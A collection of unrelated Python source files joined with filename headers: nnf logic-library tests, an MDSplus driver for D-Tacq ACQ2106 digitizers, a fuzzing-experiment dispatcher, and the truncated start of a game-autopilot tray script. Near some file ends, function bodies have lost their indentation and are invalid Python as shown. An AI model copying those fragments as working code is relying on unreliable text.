if shutil.which('dsharp') is not None:
    def test_dsharp_compile_uf20():
        """Compiling a fixed benchmark CNF preserves equivalence and yields
        decomposable (and, when requested, smooth) output."""
        sentence = uf20_cnf[0]
        compiled = dsharp.compile(sentence)
        compiled_smooth = dsharp.compile(sentence, smooth=True)
        assert sentence.equivalent(compiled)
        assert sentence.equivalent(compiled_smooth)
        assert compiled.decomposable()
        assert compiled_smooth.decomposable()
        assert compiled_smooth.smooth()

    @given(CNF())
    def test_dsharp_compile(sentence: And[Or[Var]]):
        """Compiled output is decomposable; equivalence is only guaranteed
        for satisfiable inputs."""
        compiled = dsharp.compile(sentence)
        compiled_smooth = dsharp.compile(sentence, smooth=True)
        assert compiled.decomposable()
        assert compiled_smooth.decomposable()
        assert compiled_smooth.smooth()
        if sentence.satisfiable():  # See nnf.dsharp.__doc__
            assert sentence.equivalent(compiled)
            assert sentence.equivalent(compiled_smooth)

    @given(CNF())
    def test_dsharp_compile_converting_names(sentence: And[Or[Var]]):
        """dsharp round-trips non-integer (string) variable names."""
        sentence = And(Or(Var(str(var.name), var.true) for var in clause)
                       for clause in sentence)
        compiled = dsharp.compile(sentence)
        assert all(isinstance(name, str) for name in compiled.vars())
        if sentence.satisfiable():
            assert sentence.equivalent(compiled)
def test_mark_deterministic():
    """Determinism marks are tracked per object identity, not equality."""
    s = And()
    t = And()
    # s and t compare equal, but marking must distinguish the two objects.
    assert not s.marked_deterministic()
    assert not t.marked_deterministic()
    s.mark_deterministic()
    assert s.marked_deterministic()
    assert not t.marked_deterministic()
    t.mark_deterministic()
    assert s.marked_deterministic()
    assert t.marked_deterministic()
    # Deleting one marked sentence must not disturb the other's mark
    # (presumably the mark store is weakly keyed -- this guards that).
    del s
    assert t.marked_deterministic()
@given(NNF())
def test_tseitin(sentence: nnf.NNF):
    """Tseitin conversion yields strict CNF whose auxiliary-free projection
    is equivalent to the original and model counts agree."""
    # Assumption to reduce the time in testing
    assume(sentence.size() <= 10)
    T = tseitin.to_CNF(sentence)
    assert T.is_CNF()
    assert T.is_CNF(strict=True)
    # Converting an already-converted sentence is a no-op.
    assert tseitin.to_CNF(T) == T
    # Forgetting the auxiliary variables recovers the original theory.
    assert T.forget_aux().equivalent(sentence)
    # Model-for-model agreement once models are completed over the union
    # of both variable sets.
    models = list(complete_models(T.models(), sentence.vars() | T.vars()))
    for mt in models:
        assert sentence.satisfied_by(mt)
    assert len(models) == sentence.model_count()
@given(CNF())
def test_tseitin_preserves_CNF(sentence: And[Or[Var]]):
    """to_CNF() must leave a sentence that is already CNF untouched."""
    assert sentence.to_CNF() == sentence


def test_tseitin_required_detection():
    """to_CNF() normalizes trivial shapes without a full Tseitin encoding."""
    assert a.to_CNF() == And({Or({a})})
    assert And().to_CNF() == And()
    assert Or().to_CNF() == And({Or()})
    assert (a | b).to_CNF() == And({a | b})
    assert And({a | b, b | c}).to_CNF() == And({a | b, b | c})
    # Redundant single-child nesting collapses away.
    assert And({And({Or({And({~a})})})}).to_CNF() == And({Or({~a})})
@given(models())
def test_complete_models(model: nnf.And[nnf.Var]):
    """complete_models() expands partial models over missing variables.

    Adding k unseen variables must multiply the model count by 2**k, and
    every completed model must cover the full variable set.
    """
    m = {v.name: v.true for v in model}
    neg = {v.name: not v.true for v in model}
    zero = list(complete_models([m], model.vars()))
    assert len(zero) == 1
    one = list(complete_models([m], model.vars() | {"test1"}))
    assert len(one) == 2
    two = list(complete_models([m], model.vars() | {"test1", "test2"}))
    assert len(two) == 4
    assert all(x.keys() == m.keys() | {"test1", "test2"} for x in two)
    if m:
        # Only when the model is non-empty is its negation distinct; then
        # two disjoint partial models each expand to four completions.
        multi = list(
            complete_models([m, neg], model.vars() | {"test1", "test2"})
        )
        assert len(multi) == 8
        assert len({frozenset(x.items()) for x in multi}) == 8  # all unique
        assert all(x.keys() == m.keys() | {"test1", "test2"} for x in multi)
# The bundled kissat backend is only exercised on 64-bit Linux.
if (platform.uname().system, platform.uname().machine) == ('Linux', 'x86_64'):
    @config(sat_backend="kissat")
    def test_kissat_uf20():
        """kissat agrees the uf20 benchmark sentences are satisfiable."""
        for sentence in uf20_cnf:
            assert sentence.satisfiable()

    @config(sat_backend="kissat")
    @given(CNF())
    def test_kissat_cnf(sentence: And[Or[Var]]):
        """kissat and the native CNF solver agree on satisfiability."""
        assert sentence.satisfiable() == sentence._cnf_satisfiable_native()

    @config(sat_backend="kissat")
    @given(NNF())
    def test_kissat_nnf(sentence: And[Or[Var]]):
        """On arbitrary NNF, kissat agrees with native solving after a
        Tseitin conversion (which preserves satisfiability)."""
        assert (
            sentence.satisfiable()
            == tseitin.to_CNF(sentence)._cnf_satisfiable_native()
        )
@config(sat_backend="auto")
def test_config():
    """Exercise the config object's full API surface.

    Covers imperative assignment, context-manager use (restore semantics
    and re-entrancy), decorator use, and validation of both bad values and
    unknown setting names.  Order matters: each assertion checks the state
    left behind by the previous step.
    """
    assert config.sat_backend == "auto"
    # Imperative style works
    config.sat_backend = "native"
    assert config.sat_backend == "native"
    # Context manager works
    with config(sat_backend="kissat"):
        assert config.sat_backend == "kissat"
    assert config.sat_backend == "native"
    # Bad values are caught
    with pytest.raises(ValueError):
        config.sat_backend = "invalid"
    # In context managers too, before we enter
    with pytest.raises(ValueError):
        with config(sat_backend="invalid"):
            assert False
    config.sat_backend = "kissat"
    assert config.sat_backend == "kissat"
    # Old value is restored when we leave, even if changed inside
    # (this may or may not be desirable behavior, but if it changes
    # we should know)
    with config(sat_backend="native"):
        assert config.sat_backend == "native"
        config.sat_backend = "auto"
        assert config.sat_backend == "auto"
    assert config.sat_backend == "kissat"
    # Bad settings are caught
    with pytest.raises(AttributeError):
        config.invalid = "somevalue"
    # Decorator works
    @config(sat_backend="native")
    def somefunc(recurse=False):
        assert config.sat_backend == "native"
        if recurse:
            # Even if we call it again while it's in progress
            config.sat_backend = "auto"
            somefunc(recurse=False)
            assert config.sat_backend == "auto"
    somefunc()
    assert config.sat_backend == "kissat"
    somefunc(recurse=True)
    assert config.sat_backend == "kissat"
    # Context managers can be reused and nested without getting confused
    reentrant_cm = config(sat_backend="auto")
    assert config.sat_backend == "kissat"
    with reentrant_cm:
        assert config.sat_backend == "auto"
        config.sat_backend = "native"
        with reentrant_cm:
            assert config.sat_backend == "auto"
        assert config.sat_backend == "native"
    assert config.sat_backend == "kissat"
@config(sat_backend="auto")
def test_config_multithreading():
    """Config state is thread-local: a change in the main thread is not
    visible in a spawned thread, and vice versa."""
    # Settings from one thread don't affect another
    config.sat_backend = "native"
    def f():
        # The new thread sees the decorator's value, not "native".
        assert config.sat_backend == "auto"
        config.sat_backend = "kissat"
        assert config.sat_backend == "kissat"
    thread = threading.Thread(target=f)
    thread.start()
    thread.join()
    # The spawned thread's change did not leak back.
    assert config.sat_backend == "native"
@given(NNF())
def test_solve(sentence: nnf.NNF):
    """solve() returns a satisfying model, or None when unsatisfiable."""
    model = sentence.solve()
    if model is not None:
        assert sentence.satisfiable()
        assert sentence.satisfied_by(model)
    else:
        assert not sentence.satisfiable()
@pytest.fixture(
    scope="module",
    params=[
        # Every pysat solver backend the integration tests run against.
        "cadical",
        "glucose30",
        "glucose41",
        "lingeling",
        "maplechrono",
        "maplecm",
        "maplesat",
        "minicard",
        "minisat22",
        "minisat-gh",
    ],
)
def pysat_solver(request):
    """Return a config context manager selecting one pysat backend."""
    return config(pysat_solver=request.param)
# The pysat integration is optional; define these tests only when the
# python-sat package is importable.
if pysat.available:
    @given(sentence=CNF())
    def test_pysat_satisfiable(sentence: And[Or[Var]], pysat_solver):
        """pysat agrees with the native solver on satisfiability."""
        with pysat_solver:
            assert sentence._cnf_satisfiable_native() == pysat.satisfiable(
                sentence
            )

    @given(sentence=CNF())
    def test_pysat_models(sentence: And[Or[Var]], pysat_solver):
        """pysat enumerates exactly the native model set, without repeats."""
        native_models = list(sentence._cnf_models_native())
        with pysat_solver:
            pysat_models = list(pysat.models(sentence))
        native_set = model_set(native_models)
        pysat_set = model_set(pysat_models)
        assert native_set == pysat_set
        # Equal lengths too, so neither enumeration produced duplicates.
        assert (
            len(native_models)
            == len(pysat_models)
            == len(native_set)
            == len(pysat_set)
        )

    @given(sentence=CNF())
    def test_pysat_solve(sentence: And[Or[Var]], pysat_solver):
        """pysat.solve agrees with the native solver, and any returned
        model actually satisfies the sentence."""
        with pysat_solver:
            native_solution = sentence._cnf_solve()
            pysat_solution = pysat.solve(sentence)
            if native_solution is None:
                assert pysat_solution is None
                assert not sentence._cnf_satisfiable_native()
                assert not pysat.satisfiable(sentence)
            else:
                assert pysat_solution is not None
                assert sentence.satisfied_by(native_solution)
                assert sentence.satisfied_by(pysat_solution)
                assert sentence._cnf_satisfiable_native()
                assert pysat.satisfiable(sentence)

    def test_pysat_uf20(pysat_solver):
        """Every uf20 benchmark sentence is solvable through pysat."""
        with pysat_solver:
            for sentence in uf20_cnf:
                assert pysat.satisfiable(sentence)
                solution = pysat.solve(sentence)
                assert solution
                assert sentence.satisfied_by(solution)
@given(NNF())
def test_satisfiable(sentence: nnf.NNF):
    """satisfiable() agrees with brute-force model enumeration."""
    brute_force = any(
        sentence.satisfied_by(model)
        for model in all_models(sentence.vars())
    )
    assert sentence.satisfiable() == brute_force


@given(NNF())
def test_models(sentence: nnf.NNF):
    """models() yields exactly the satisfying assignments, no repeats."""
    expected = [
        model
        for model in all_models(sentence.vars())
        if sentence.satisfied_by(model)
    ]
    found = list(sentence.models())
    assert len(found) == len(expected)
    assert model_set(found) == model_set(expected)
@config(auto_simplify=False)
def test_nesting():
    """auto_simplify controls whether &/| flatten nested And/Or operands.

    For each case (left/right/both-side nesting, And/Or/mixed) the same
    formula is built with auto_simplify off (nested structure preserved
    verbatim) and on (same-type children flattened into one level).
    """
    a, b, c, d, e, f = Var("a"), Var("b"), Var("c"), Var("d"), \
        Var("e"), Var("f")
    # test left nestings on And
    config.auto_simplify = False
    formula = a & (b & c)
    formula = formula & (d | e)
    assert formula == And({And({And({b, c}), a}), Or({d, e})})
    config.auto_simplify = True
    formula = a & (b & c)
    formula = formula & (d | e)
    assert formula == And({a, b, c, Or({d, e})})
    # test right nestings on And
    config.auto_simplify = False
    formula = a & (b & c)
    formula = (d | e) & formula
    assert formula == And({And({And({b, c}), a}), Or({d, e})})
    config.auto_simplify = True
    formula = a & (b & c)
    formula = (d | e) & formula
    assert formula == And({a, b, c, Or({d, e})})
    # test nestings on both sides with And
    config.auto_simplify = False
    formula = a & (b & c)
    formula2 = d & (e & f)
    formula = formula & formula2
    assert formula == And({(And({a, And({b, c})})), And({d, And({e, f})})})
    config.auto_simplify = True
    formula = a & (b & c)
    formula2 = d & (e & f)
    formula = formula & formula2
    assert formula == And({a, b, c, d, e, f})
    # test left nestings on Or
    config.auto_simplify = False
    formula = a | (b | c)
    formula = formula | (d & e)
    assert formula == Or({Or({Or({b, c}), a}), And({d, e})})
    config.auto_simplify = True
    formula = a | (b | c)
    formula = formula | (d & e)
    assert formula == Or({a, b, c, And({d, e})})
    # test right nestings on Or
    config.auto_simplify = False
    formula = a | (b | c)
    formula = (d & e) | formula
    assert formula == Or({Or({Or({b, c}), a}), And({d, e})})
    config.auto_simplify = True
    formula = a | (b | c)
    formula = (d & e) | formula
    assert formula == Or({a, b, c, And({d, e})})
    # test nestings on both sides with Or
    config.auto_simplify = False
    formula = a | (b | c)
    formula2 = d | (e | f)
    formula = formula | formula2
    assert formula == Or({(Or({a, Or({b, c})})), Or({d, Or({e, f})})})
    config.auto_simplify = True
    formula = a | (b | c)
    formula2 = d | (e | f)
    formula = formula | formula2
    assert formula == Or({a, b, c, d, e, f})
    # test nestings with both And and Or
    config.auto_simplify = False
    formula = a & (b | c)
    formula2 = d & (e & f)
    formula = formula | formula2
    assert formula == Or({(And({a, Or({b, c})})), And({d, And({e, f})})})
    config.auto_simplify = True
    formula = a & (b | c)
    formula2 = d & (e & f)
    formula = formula | formula2
    # Only the same-type (And-in-And) nesting flattens; Or({b, c}) stays.
    assert formula == Or({(And({a, Or({b, c})})), And({d, e, f})})
|
acq2106_423st.py | #
# Copyright (c) 2017, Massachusetts Institute of Technology All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import MDSplus
def threaded(fn):
    """Decorator: run the wrapped function in a background thread.

    The wrapper starts the thread immediately and returns the Thread
    object so callers may join it if they wish.
    """
    def wrapper(*args, **kwargs):
        import threading
        worker = threading.Thread(target=fn, args=args, kwargs=kwargs)
        worker.start()
        return worker
    return wrapper
class Acq2106_423st(MDSplus.Device):
    """
    D-Tacq ACQ2106 with ACQ423 Digitizers (up to 6) real time streaming support.

    32 Channels * number of slots
    Minimum 2Khz Operation
    24 bits == +-10V

    3 trigger modes:
        Automatic - starts recording on arm
        Soft - starts recording on trigger method (reboot / configuration required to switch )
        Hard - starts recording on hardware trigger input

    Software sample decimation
    Settable segment length in number of samples

    debugging() - is debugging enabled. Controlled by environment variable DEBUG_DEVICES
    """
    carrier_parts=[
        {'path':':NODE','type':'text','value':'192.168.0.254', 'options':('no_write_shot')},
        {'path':':COMMENT','type':'text', 'options':('no_write_shot')},
        {'path':':TRIGGER','type':'numeric', 'value': 0.0, 'options':('no_write_shot')},
        {'path':':TRIG_MODE','type':'text', 'value': 'hard', 'options':('no_write_shot')},
        {'path':':EXT_CLOCK','type':'axis', 'options':('no_write_shot')},
        {'path':':FREQ','type':'numeric', 'value': 16000, 'options':('no_write_shot')},
        {'path':':DEF_DCIM','type':'numeric', 'value': 1, 'options':('no_write_shot')},
        {'path':':SEG_LENGTH','type':'numeric', 'value': 8000, 'options':('no_write_shot')},
        {'path':':MAX_SEGMENTS','type':'numeric', 'value': 1000, 'options':('no_write_shot')},
        {'path':':SEG_EVENT','type':'text', 'value': 'STREAM', 'options':('no_write_shot')},
        {'path':':TRIG_TIME','type':'numeric', 'options':('write_shot')},
        {'path':':TRIG_STR','type':'text', 'options':('nowrite_shot'),
         'valueExpr':"EXT_FUNCTION(None,'ctime',head.TRIG_TIME)"},
        {'path':':RUNNING','type':'numeric', 'options':('no_write_model')},
        {'path':':LOG_FILE','type':'text', 'options':('write_once')},
        {'path':':LOG_OUTPUT','type':'text', 'options':('no_write_model', 'write_once', 'write_shot',)},
        {'path':':INIT_ACTION','type':'action',
         'valueExpr':"Action(Dispatch('CAMAC_SERVER','INIT',50,None),Method(None,'INIT',head,'auto'))",
         'options':('no_write_shot',)},
        {'path':':STOP_ACTION','type':'action',
         'valueExpr':"Action(Dispatch('CAMAC_SERVER','STORE',50,None),Method(None,'STOP',head))",
         'options':('no_write_shot',)},
    ]
    # Cached DEBUG_DEVICES value; None means "not looked up yet".
    debug = None
    data_socket = -1
    trig_types = ['hard', 'soft', 'automatic']

    @staticmethod
    def makeChans(chans):
        """Build the per-channel part dicts (INPUT plus its DECIMATE,
        COEFFICIENT and OFFSET sub-nodes) for |chans| channels."""
        ans = []
        for i in range(chans):
            ans.append({'path':':INPUT_%3.3d'%(i+1,),'type':'signal','options':('no_write_model','write_once',),
                        'valueExpr':'head.setChanScale(%d)' %(i+1,)})
            ans.append({'path':':INPUT_%3.3d:DECIMATE'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
            ans.append({'path':':INPUT_%3.3d:COEFFICIENT'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
            ans.append({'path':':INPUT_%3.3d:OFFSET'%(i+1,),'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
        return ans

    def init(self):
        """Configure clocking, load per-card calibration into the tree, and
        start the streaming thread."""
        import HtsDevices.acq400_hapi as acq400_hapi
        uut = acq400_hapi.Acq400(self.node.data(), monitor=False)
        uut.s0.set_knob('set_abort', '1')
        if self.ext_clock.length > 0:
            # External clock on the front panel input.
            uut.s0.set_knob('SYS_CLK_FPMUX', 'FPCLK')
            uut.s0.set_knob('SIG_CLK_MB_FIN', '1000000')
        else:
            uut.s0.set_knob('SYS_CLK_FPMUX', 'ZCLK')
        freq = int(self.freq.data())
        uut.s0.set_knob('sync_role', 'master %d TRG:DX=d0' % freq)
        # Collect the site objects that are present; accessing a site that
        # is not populated raises, which ends the collection early.
        try:
            slots = [uut.s1]
            slots.append(uut.s2)
            slots.append(uut.s3)
            slots.append(uut.s4)
            slots.append(uut.s5)
            slots.append(uut.s6)
        except Exception:
            pass
        for card in range(self.sites):
            # BUG FIX: map() is a lazy iterator on Python 3 and cannot be
            # indexed -- materialize it.  Also read the offsets from the
            # card being processed, not unconditionally from site 1.
            coeffs = list(map(float, slots[card].AI_CAL_ESLO.split(" ")[3:]))
            offsets = list(map(float, slots[card].AI_CAL_EOFF.split(" ")[3:]))
            for i in range(32):
                coeff = self.__getattr__('input_%3.3d_coefficient'%(card*32+i+1))
                coeff.record = coeffs[i]
                offset = self.__getattr__('input_%3.3d_offset'%(card*32+i+1))
                offset.record = offsets[i]
        self.running.on = True
        self.stream()
        return 1
    INIT = init

    def stop(self):
        """Ask the streaming thread to finish after its current segment."""
        self.running.on = False
        return 1
    STOP = stop

    def trig(self):
        """Send a soft trigger to the carrier (used in 'soft' trig mode)."""
        import HtsDevices.acq400_hapi as acq400_hapi
        uut = acq400_hapi.Acq400(self.node.data(), monitor=False)
        # BUG FIX: 'uut.so' was a typo for site 0 ('uut.s0'); the original
        # raised AttributeError instead of triggering.
        uut.s0.set_knob('soft_trigger', '1')
        return 1
    TRIG = trig

    @threaded
    def stream(self):
        """Read raw sample frames from the carrier's streaming port (4210)
        and store them as decimated MDSplus segments until stopped or
        MAX_SEGMENTS is reached.  Runs in a background thread."""
        import socket
        import numpy as np
        import datetime
        import time
        import sys
        from MDSplus import Event, Range

        def lcm(a, b):
            # fractions.gcd was removed in Python 3.9; fall back for py2.
            try:
                from math import gcd
            except ImportError:
                from fractions import gcd
            return (a * b / gcd(int(a), int(b)))

        def lcma(arr):
            """Least common multiple of all entries in arr."""
            ans = 1.
            for e in arr:
                ans = lcm(ans, e)
            return int(ans)

        print("starting streamer for %s %s %s\nat: %s"%(self.tree, self.tree.shot, self.path, datetime.datetime.now()))
        event_name = self.seg_event.data()
        dt = 1./self.freq.data()
        chans = []
        decim = []
        nchans = self.sites*32
        for i in range(nchans):
            chans.append(getattr(self, 'input_%3.3d'%(i+1)))
            decim.append(getattr(self, 'input_%3.3d_decimate' %(i+1)).data())
        # Round the segment length up to a multiple of every channel's
        # decimation factor so each segment demuxes evenly.
        decimator = lcma(decim)
        seg_length = self.seg_length.data()
        if seg_length % decimator:
            seg_length = (seg_length // decimator + 1) * decimator
        # 4 bytes per sample per channel (ACQ423 samples arrive in 32-bit
        # words -- 24 significant bits).
        segment_bytes = seg_length*nchans*4
        dims = []
        for i in range(nchans):
            dims.append(Range(0., (seg_length-1)*dt, dt*decim[i]))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.node.data(), 4210))
        s.settimeout(6)
        segment = 0
        running = self.running
        max_segments = self.max_segments.data()
        first = True
        buf = bytearray(segment_bytes)
        while running.on and segment < max_segments:
            toread = segment_bytes
            try:
                view = memoryview(buf)
                while toread:
                    nbytes = s.recv_into(view, min(4096, toread))
                    if first:
                        # First byte received marks the trigger time.
                        self.trig_time.record = time.time()
                        first = False
                    view = view[nbytes:]  # slicing views is cheap
                    toread -= nbytes
            except socket.timeout as e:
                print("got a timeout")
                err = e.args[0]
                # this next if/else is a bit redundant, but illustrates how the
                # timeout exception is setup
                if err == 'timed out':
                    time.sleep(1)
                    print('recv timed out, retry later')
                    if not running.on:
                        break
                    else:
                        continue
                else:
                    print(e)
                    break
            except socket.error as e:
                # Something else happened, handle error, exit, etc.
                print("socket error", e)
                break
            else:
                if toread != 0:
                    print('orderly shutdown on server end')
                    break
                else:
                    # BUG FIX: samples are 4 bytes wide (segment_bytes uses
                    # nchans*4), so the buffer must be viewed as int32;
                    # 'int16' doubled the element count and mis-framed
                    # every channel.
                    buffer = np.frombuffer(buf, dtype='int32')
                    i = 0
                    for c in chans:
                        if c.on:
                            # Demux channel i with its decimation stride.
                            b = buffer[i::nchans*decim[i]]
                            c.makeSegment(dims[i].begin, dims[i].ending, dims[i], b)
                            dims[i] = Range(dims[i].begin + seg_length*dt, dims[i].ending + seg_length*dt, dt*decim[i])
                        i += 1
                    segment += 1
                    Event.setevent(event_name)
        if self.log_output.on:
            print("%s\tAll Done"%(datetime.datetime.now(),))
        sys.stdout.flush()

    def setChanScale(self, num):
        """Attach the linear scale raw*COEFFICIENT+OFFSET to channel num."""
        chan = self.__getattr__('INPUT_%3.3d' % num)
        chan.setSegmentScale(MDSplus.ADD(MDSplus.MULTIPLY(chan.COEFFICIENT, MDSplus.dVALUE()), chan.OFFSET))
class ACQ2106_423_1ST(Acq2106_423st):
    """
    D-Tacq ACQ2106 with 1 acq423 32 channel digitizers in streaming mode
    """
    sites = 1
    # Reuse the base-class helper instead of duplicating the per-channel
    # part construction inline (also avoids leaking loop temporaries as
    # class attributes).
    parts = Acq2106_423st.carrier_parts + Acq2106_423st.makeChans(sites * 32)
class ACQ2106_423_2ST(Acq2106_423st):
    """
    D-Tacq ACQ2106 with 2 acq423 32 channel digitizers in streaming mode
    """
    sites = 2
    # Reuse the base-class helper instead of duplicating the per-channel
    # part construction inline.
    parts = Acq2106_423st.carrier_parts + Acq2106_423st.makeChans(sites * 32)
class ACQ2106_423_3ST(Acq2106_423st):
    """
    D-Tacq ACQ2106 with 3 acq423 32 channel digitizers in streaming mode
    """
    sites = 3
    # Reuse the base-class helper instead of duplicating the per-channel
    # part construction inline.
    parts = Acq2106_423st.carrier_parts + Acq2106_423st.makeChans(sites * 32)
class ACQ2106_423_4ST(Acq2106_423st):
    """
    D-Tacq ACQ2106 with 4 acq423 32 channel digitizers in streaming mode
    """
    sites = 4
    # Reuse the base-class helper instead of duplicating the per-channel
    # part construction inline.
    parts = Acq2106_423st.carrier_parts + Acq2106_423st.makeChans(sites * 32)
class ACQ2106_423_5ST(Acq2106_423st):
    """
    D-Tacq ACQ2106 with 5 acq423 32 channel digitizers in streaming mode
    """
    sites = 5
    # Reuse the base-class helper instead of duplicating the per-channel
    # part construction inline.
    parts = Acq2106_423st.carrier_parts + Acq2106_423st.makeChans(sites * 32)
class ACQ2106_423_6ST(Acq2106_423st):
    """
    D-Tacq ACQ2106 with 6 acq423 32 channel digitizers in streaming mode
    """
    sites = 6
    # Reuse the base-class helper instead of duplicating the per-channel
    # part construction inline.
    parts = Acq2106_423st.carrier_parts + Acq2106_423st.makeChans(sites * 32)
def debugging(self):
import os
if self.debug == None:
self.debug=os.getenv("DEBUG_DEVICES")
return(self.debug)
|
dispatcher.py | #!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Script to run on the dispatcher. Builds each benchmark with each fuzzing
configuration, spawns a runner VM for each benchmark-fuzzer combo, and then
records coverage data received from the runner VMs."""
import multiprocessing
import os
import sys
import threading
import time
from typing import List
from common import experiment_path as exp_path
from common import experiment_utils
from common import logs
from common import yaml_utils
from database import models
from database import utils as db_utils
from experiment.build import builder
from experiment import measurer
from experiment import reporter
from experiment import scheduler
from experiment import stop_experiment
LOOP_WAIT_SECONDS = 5 * 60
# TODO(metzman): Convert more uses of os.path.join to exp_path.path.
def _get_config_dir():
    """Return config directory."""
    config_dir = experiment_utils.CONFIG_DIR
    return exp_path.path(config_dir)
def create_work_subdirs(subdirs: List[str]):
    """Create each of |subdirs| inside the experiment work directory."""
    for subdir in subdirs:
        subdir_path = os.path.join(experiment_utils.get_work_dir(), subdir)
        os.mkdir(subdir_path)
def _initialize_experiment_in_db(experiment_config: dict,
                                 trials: List[models.Trial]):
    """Initializes |experiment| in the database by creating the experiment
    entity and entities for each trial in the experiment."""
    # Experiments default to private unless the config says otherwise.
    db_utils.add_all([
        db_utils.get_or_create(models.Experiment,
                               name=experiment_config['experiment'],
                               git_hash=experiment_config['git_hash'],
                               private=experiment_config.get('private', True))
    ])
    # TODO(metzman): Consider doing this without sqlalchemy. This can get
    # slow with SQLalchemy (it's much worse with add_all).
    db_utils.bulk_save(trials)
class Experiment:  # pylint: disable=too-many-instance-attributes
    """Class representing an experiment."""

    def __init__(self, experiment_config_filepath: str):
        """Load the YAML config at |experiment_config_filepath| and expose
        its fields as attributes."""
        config = yaml_utils.read(experiment_config_filepath)
        self.config = config
        self.benchmarks = config['benchmarks'].split(',')
        self.fuzzers = config['fuzzers'].split(',')
        self.num_trials = config['trials']
        self.experiment_name = config['experiment']
        self.git_hash = config['git_hash']
        self.preemptible = config.get('preemptible_runners')
def build_images_for_trials(fuzzers: List[str], benchmarks: List[str],
                            num_trials: int,
                            preemptible: bool) -> List[models.Trial]:
    """Builds the images needed to run |experiment| and returns a list of trials
    that can be run for experiment. This is the number of trials specified in
    experiment times each pair of fuzzer+benchmark that builds successfully."""
    # This call will raise an exception if the images can't be built which will
    # halt the experiment.
    builder.build_base_images()
    # Only build fuzzers for benchmarks whose measurers built successfully.
    benchmarks = builder.build_all_measurers(benchmarks)
    build_successes = builder.build_all_fuzzer_benchmarks(fuzzers, benchmarks)
    experiment_name = experiment_utils.get_experiment_name()
    # num_trials trials for every fuzzer+benchmark pair that built.
    return [
        models.Trial(fuzzer=fuzzer,
                     experiment=experiment_name,
                     benchmark=benchmark,
                     preemptible=preemptible)
        for fuzzer, benchmark in build_successes
        for _ in range(num_trials)
    ]
def dispatcher_main():
    """Do the experiment and report results."""
    logs.info('Starting experiment.')
    # Set this here because we get failures if we do it in measurer for some
    # reason.
    multiprocessing.set_start_method('spawn')
    db_utils.initialize()
    if experiment_utils.is_local_experiment():
        # Local runs have no pre-provisioned database; create the schema.
        models.Base.metadata.create_all(db_utils.engine)
    experiment_config_file_path = os.path.join(_get_config_dir(),
                                               'experiment.yaml')
    experiment = Experiment(experiment_config_file_path)
    preemptible = experiment.preemptible
    trials = build_images_for_trials(experiment.fuzzers, experiment.benchmarks,
                                     experiment.num_trials, preemptible)
    _initialize_experiment_in_db(experiment.config, trials)
    create_work_subdirs(['experiment-folders', 'measurement-folders'])
    # Start measurer and scheduler in separate threads/processes.
    scheduler_loop_thread = threading.Thread(target=scheduler.schedule_loop,
                                             args=(experiment.config,))
    scheduler_loop_thread.start()
    measurer_main_process = multiprocessing.Process(
        target=measurer.measure_main, args=(experiment.config,))
    measurer_main_process.start()
    is_complete = False
    while True:
        time.sleep(LOOP_WAIT_SECONDS)
        if not scheduler_loop_thread.is_alive():
            # Scheduling is done; the experiment is complete once the
            # measurer has also drained its work and exited.
            is_complete = not measurer_main_process.is_alive()
        # Generate periodic output reports.
        reporter.output_report(experiment.config, in_progress=not is_complete)
        if is_complete:
            # Experiment is complete, bail out.
            break
    logs.info('Dispatcher finished.')
    scheduler_loop_thread.join()
    measurer_main_process.join()
def main():
    """Do the experiment and report results.

    Returns 0 on success (or for local experiments, which need no
    teardown), 1 when stopping the experiment's cloud resources fails.
    """
    logs.initialize(default_extras={
        'component': 'dispatcher',
    })
    try:
        dispatcher_main()
    except Exception:
        # Log, then re-raise with a bare `raise` so the original traceback
        # is preserved exactly (raising the bound name rewrites the
        # propagation point).
        logs.error('Error conducting experiment.')
        raise
    experiment_config_file_path = os.path.join(_get_config_dir(),
                                               'experiment.yaml')
    if experiment_utils.is_local_experiment():
        return 0
    if stop_experiment.stop_experiment(experiment_utils.get_experiment_name(),
                                       experiment_config_file_path):
        return 0
    return 1
if __name__ == '__main__':
sys.exit(main())
|
dev_tray.py | import threading
import keyboard
import kthread
from PIL import Image
from pystray import Icon, MenuItem, Menu
from dev_autopilot import autopilot, resource_path, get_bindings, clear_input, set_scanner
STATE = 0
icon = None
thread = None
def setup(icon):
    """pystray setup callback: show the tray icon once the loop is ready."""
    icon.visible = True
def exit_action():
    """Stop the autopilot thread, hide the tray icon, and end the loop."""
    stop_action()
    icon.visible = False
    icon.stop()
def start_action():
    """(Re)start the autopilot in a killable background thread."""
    # Kill any previous run first so only one autopilot thread exists.
    stop_action()
    kthread.KThread(target=autopilot, name="EDAutopilot").start()
def stop_action():
    """Kill every running autopilot thread and release any held inputs."""
